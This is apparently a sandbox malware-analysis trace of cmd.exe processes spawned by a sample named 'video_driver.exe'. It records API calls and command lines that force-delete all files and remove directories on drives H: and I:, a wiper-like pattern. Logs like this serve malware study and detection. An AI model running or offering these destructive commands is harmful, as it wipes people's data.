lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x4, lpData=0x16e8c0*=0x0, lpcbData=0x16e8b8*=0x4) returned 0x0 [0058.763] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x4, lpData=0x16e8c0*=0x9, lpcbData=0x16e8b8*=0x4) returned 0x0 [0058.763] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x4, lpData=0x16e8c0*=0x9, lpcbData=0x16e8b8*=0x4) returned 0x0 [0058.763] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e8bc, lpData=0x16e8c0, lpcbData=0x16e8b8*=0x1000 | out: lpType=0x16e8bc*=0x0, lpData=0x16e8c0*=0x9, lpcbData=0x16e8b8*=0x1000) returned 0x2 [0058.763] RegCloseKey (hKey=0x68) returned 0x0 [0058.763] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b67 [0058.763] srand (_Seed=0x5eb34b67) [0058.763] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"H:\" del /f /s /q \"H:\" & FOR /D %p IN (\"H:\") DO rmdir \"%p\" /s /q" [0058.763] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"H:\" del /f /s /q \"H:\" & FOR /D %p IN (\"H:\") DO rmdir \"%p\" /s /q" [0058.764] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0058.764] GetProcessHeap () returned 0x330000 [0058.764] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x210) returned 0x3420f8 [0058.764] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x342100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0058.764] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0058.764] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0058.764] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0058.764] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0058.764] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0058.764] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0058.764] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0058.764] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0058.764] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0058.764] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0058.764] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0058.765] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0058.765] GetProcessHeap () returned 0x330000 [0058.765] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x342bd0 | out: hHeap=0x330000) returned 1 [0058.765] GetEnvironmentStringsW () returned 0x342310* [0058.765] GetProcessHeap () returned 0x330000 [0058.765] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xae2) returned 0x344c70 [0058.765] FreeEnvironmentStringsW (penv=0x342310) returned 1 [0058.765] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0058.765] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0058.765] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0058.765] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0058.765] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0058.765] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0058.765] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0058.765] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0058.765] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0058.765] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0058.765] GetProcessHeap () returned 0x330000 [0058.765] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x54) returned 0x3417c8 [0058.765] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f680 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0058.766] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x16f680, lpFilePart=0x16f67c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f67c*="Desktop") returned 0x25 [0058.766] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0058.766] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f3fc | out: lpFindFileData=0x16f3fc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x345760 [0058.766] FindClose (in: hFindFile=0x345760 | out: hFindFile=0x345760) returned 1 [0058.766] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x16f3fc | out: lpFindFileData=0x16f3fc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x345760 [0058.766] FindClose (in: hFindFile=0x345760 | out: hFindFile=0x345760) returned 1 [0058.766] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0058.766] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x16f3fc | out: lpFindFileData=0x16f3fc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x345760 [0058.766] FindClose (in: hFindFile=0x345760 | out: hFindFile=0x345760) returned 1 [0058.767] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0058.767] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0058.767] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0058.767] GetProcessHeap () returned 0x330000 [0058.767] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x344c70 | out: hHeap=0x330000) returned 1 [0058.767] GetEnvironmentStringsW () returned 0x344180* [0058.767] GetProcessHeap () returned 0x330000 [0058.767] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb36) returned 0x345fa0 [0058.767] FreeEnvironmentStringsW (penv=0x344180) returned 1 [0058.767] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0058.767] GetProcessHeap () returned 0x330000 [0058.767] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x3417c8 | out: hHeap=0x330000) returned 1 [0058.767] GetProcessHeap () returned 0x330000 [0058.767] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x400e) returned 0x346ae0 [0058.768] GetProcessHeap () returned 0x330000 [0058.768] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xa0) returned 0x342e50 [0058.768] GetProcessHeap () returned 0x330000 [0058.768] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x346ae0 | out: hHeap=0x330000) returned 1 [0058.768] GetConsoleOutputCP () returned 0x1b5 [0058.839] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0058.839] GetUserDefaultLCID () returned 0x409 [0058.840] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0058.840] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f7c0, cchData=128 | out: lpLCData="0") returned 2 [0058.840] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f7c0, cchData=128 | out: lpLCData="0") returned 2 [0058.840] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f7c0, cchData=128 | out: lpLCData="1") returned 2 [0058.840] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0058.840] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0058.840] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0058.840] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0058.840] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0058.840] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0058.841] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0058.841] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0058.841] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0058.841] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0058.841] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0058.842] GetProcessHeap () returned 0x330000 [0058.842] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x20c) returned 0x342ef8 [0058.842] GetConsoleTitleW (in: lpConsoleTitle=0x342ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0058.843] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0058.843] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0058.843] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0058.843] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0058.844] GetProcessHeap () returned 0x330000 [0058.844] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x400a) returned 0x346ae0 [0058.844] GetProcessHeap () returned 0x330000 [0058.844] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4008) returned 0x34aaf8 [0058.844] GetProcessHeap () returned 0x330000 [0058.844] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x1a) returned 0x3457e0 [0058.844] GetEnvironmentVariableW (in: lpName="p IN (\"H", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0058.844] _wcsicmp (_String1="p IN (\"H", _String2="CD") returned 13 [0058.844] _wcsicmp (_String1="p IN (\"H", _String2="ERRORLEVEL") returned 11 [0058.844] _wcsicmp (_String1="p IN (\"H", _String2="CMDEXTVERSION") returned 13 [0058.844] _wcsicmp (_String1="p IN (\"H", _String2="CMDCMDLINE") returned 13 [0058.844] _wcsicmp (_String1="p IN (\"H", _String2="DATE") returned 12 [0058.844] _wcsicmp (_String1="p IN (\"H", _String2="TIME") returned -4 [0058.845] _wcsicmp (_String1="p IN (\"H", _String2="RANDOM") returned -2 [0058.845] _wcsicmp (_String1="p IN (\"H", _String2="HIGHESTNUMANODENUMBER") returned 8 [0058.845] GetProcessHeap () returned 0x330000 [0058.845] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x3457e0 | out: hHeap=0x330000) returned 1 [0058.845] GetProcessHeap () returned 0x330000 [0058.845] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34aaf8 | out: hHeap=0x330000) returned 1 [0058.845] GetProcessHeap () returned 0x330000 [0058.845] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4008) returned 0x34aaf8 [0058.845] GetProcessHeap () returned 0x330000 [0058.845] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34aaf8 | out: hHeap=0x330000) returned 1 [0058.845] GetProcessHeap () returned 0x330000 [0058.845] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x346ae0 | out: hHeap=0x330000) returned 1 [0058.845] _wcsicmp (_String1="if", _String2=")") returned 64 [0058.845] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0058.845] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0058.845] _wcsicmp (_String1="IF", _String2="if") returned 0 [0058.845] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0058.845] GetProcessHeap () returned 0x330000 [0058.845] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x58) returned 0x343110 [0058.846] GetProcessHeap () returned 0x330000 [0058.846] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xe) returned 0x33ffc0 [0058.846] GetProcessHeap () returned 0x330000 [0058.846] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x20) returned 0x3457e0 [0058.847] GetProcessHeap () returned 0x330000 [0058.847] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x3457e0, Size=0x16) returned 0x341800 [0058.847] GetProcessHeap () returned 0x330000 [0058.847] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x341800) returned 0x16 [0058.847] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0058.847] GetProcessHeap () returned 0x330000 [0058.847] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x58) returned 0x343170 [0058.847] GetProcessHeap () returned 0x330000 [0058.848] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x14) returned 0x3431d0 [0058.848] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0058.848] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0058.848] GetProcessHeap () returned 0x330000 [0058.848] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x12) returned 0x3431f0 [0058.848] GetProcessHeap () returned 0x330000 [0058.848] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x1c) returned 0x3457e0 [0058.848] GetProcessHeap () returned 0x330000 [0058.848] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x3457e0, Size=0x14) returned 0x343210 [0058.848] GetProcessHeap () returned 0x330000 [0058.848] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x343210) returned 0x14 [0058.849] _wcsicmp (_String1="del", _String2=")") returned 59 [0058.849] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0058.849] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0058.849] _wcsicmp (_String1="IF", _String2="del") returned 5 [0058.849] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0058.849] _wcsicmp (_String1="REM", _String2="del") returned 14 [0058.849] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0058.849] GetProcessHeap () returned 0x330000 [0058.849] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x58) returned 0x343230 [0058.849] GetProcessHeap () returned 0x330000 [0058.849] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x10) returned 0x33ffd8 [0058.850] GetProcessHeap () returned 0x330000 [0058.850] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x28) returned 0x343290 [0058.851] GetProcessHeap () returned 0x330000 [0058.851] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x58) returned 0x3432c0 [0058.851] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0058.851] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0058.851] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0058.851] GetProcessHeap () returned 0x330000 [0058.851] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x58) returned 0x343320 [0058.851] GetProcessHeap () returned 0x330000 [0058.851] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x44) returned 0x343380 [0058.852] GetProcessHeap () returned 0x330000 [0058.852] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x14) returned 0x3433d0 [0058.852] GetProcessHeap () returned 0x330000 [0058.852] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x3433d0, Size=0x12) returned 0x3433d0 [0058.852] GetProcessHeap () returned 0x330000 [0058.852] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x3433d0) returned 0x12 [0058.852] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0058.852] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0058.852] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0058.852] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0058.853] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0058.853] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0058.853] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0058.854] GetProcessHeap () returned 0x330000 [0058.854] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x12) returned 0x3433f0 [0058.854] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0058.855] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0058.855] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0058.855] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0058.855] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0058.855] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0058.855] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0058.855] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0058.855] GetProcessHeap () returned 0x330000 [0058.855] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x58) returned 0x343410 [0058.855] GetProcessHeap () returned 0x330000 [0058.855] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x14) returned 0x343470 [0058.855] GetProcessHeap () returned 0x330000 [0058.855] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x20) returned 0x3457e0 [0058.857] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0058.859] GetFullPathNameW (in: lpFileName="H:", nBufferLength=0x208, lpBuffer=0x16f4b0, lpFilePart=0x16f25c | out: lpBuffer="H:\\", lpFilePart=0x16f25c*=0x0) returned 0x3 [0058.859] wcsncmp (_String1="H:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -20 [0058.864] GetFileAttributesW (lpFileName="H:\\" (normalized: "h:")) returned 0xffffffff [0058.864] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.864] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0058.865] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.865] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0058.865] _get_osfhandle (_FileHandle=0) returned 0x3 [0058.865] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0058.866] SetConsoleInputExeNameW () returned 0x1 [0058.866] GetConsoleOutputCP () returned 0x1b5 [0058.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0058.866] SetThreadUILanguage (LangId=0x0) returned 0x409 [0058.866] exit (_Code=0) Process: id = "28" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x439f0000" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"I:\" del /f /s /q \"I:\" & FOR /D %p IN (\"I:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 37 os_tid = 0x968 [0059.152] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24ff74 | out: lpSystemTimeAsFileTime=0x24ff74*(dwLowDateTime=0x2c076c0, dwHighDateTime=0x1d62400)) [0059.152] GetCurrentProcessId () returned 0x958 [0059.152] GetCurrentThreadId () returned 0x968 [0059.152] GetTickCount () returned 0x1146f37 [0059.152] QueryPerformanceCounter (in: lpPerformanceCount=0x24ff6c | out: lpPerformanceCount=0x24ff6c*=17928582675) returned 1 [0059.155] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0059.155] __set_app_type (_Type=0x1) [0059.155] __p__fmode () returned 0x770331f4 [0059.155] __p__commode () returned 0x770331fc [0059.155] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0059.155] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0059.155] GetCurrentThreadId () returned 0x968 [0059.155] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x968) returned 0x60 [0059.156] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0059.156] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0059.156] SetThreadUILanguage (LangId=0x0) returned 0x409 [0059.156] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0059.156] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24ff04 | out: phkResult=0x24ff04*=0x0) returned 0x2 [0059.156] VirtualQuery (in: lpAddress=0x24ff3b, lpBuffer=0x24fed4, dwLength=0x1c | out: lpBuffer=0x24fed4*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0059.156] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fed4, dwLength=0x1c | out: lpBuffer=0x24fed4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0059.156] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fed4, dwLength=0x1c | out: lpBuffer=0x24fed4*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0059.156] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fed4, dwLength=0x1c | out: lpBuffer=0x24fed4*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0059.157] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fed4, dwLength=0x1c | out: lpBuffer=0x24fed4*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x40000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0059.157] GetConsoleOutputCP () returned 0x1b5 [0059.157] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0059.157] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0059.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0059.157] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0059.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0059.157] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0059.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0059.158] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0059.158] _get_osfhandle (_FileHandle=0) returned 0x3 [0059.158] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0059.158] GetEnvironmentStringsW () returned 0x4420f8* [0059.158] GetProcessHeap () returned 0x430000 [0059.158] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xaca) returned 0x442bd0 [0059.158] FreeEnvironmentStringsW (penv=0x4420f8) returned 1 [0059.158] GetProcessHeap () returned 0x430000 [0059.158] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4) returned 0x441898 [0059.158] GetEnvironmentStringsW () returned 0x4420f8* [0059.159] GetProcessHeap () returned 0x430000 [0059.159] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xaca) returned 0x4436a8 [0059.159] FreeEnvironmentStringsW (penv=0x4420f8) returned 1 [0059.159] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ee74 | out: phkResult=0x24ee74*=0x68) returned 0x0 [0059.159] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x0, lpData=0x24ee80*=0x0, lpcbData=0x24ee78*=0x1000) returned 0x2 [0059.159] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x4, lpData=0x24ee80*=0x1, lpcbData=0x24ee78*=0x4) returned 0x0 [0059.159] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ee7c, lpData=0x24ee80, lpcbData=0x24ee78*=0x1000 | out: lpType=0x24ee7c*=0x0, 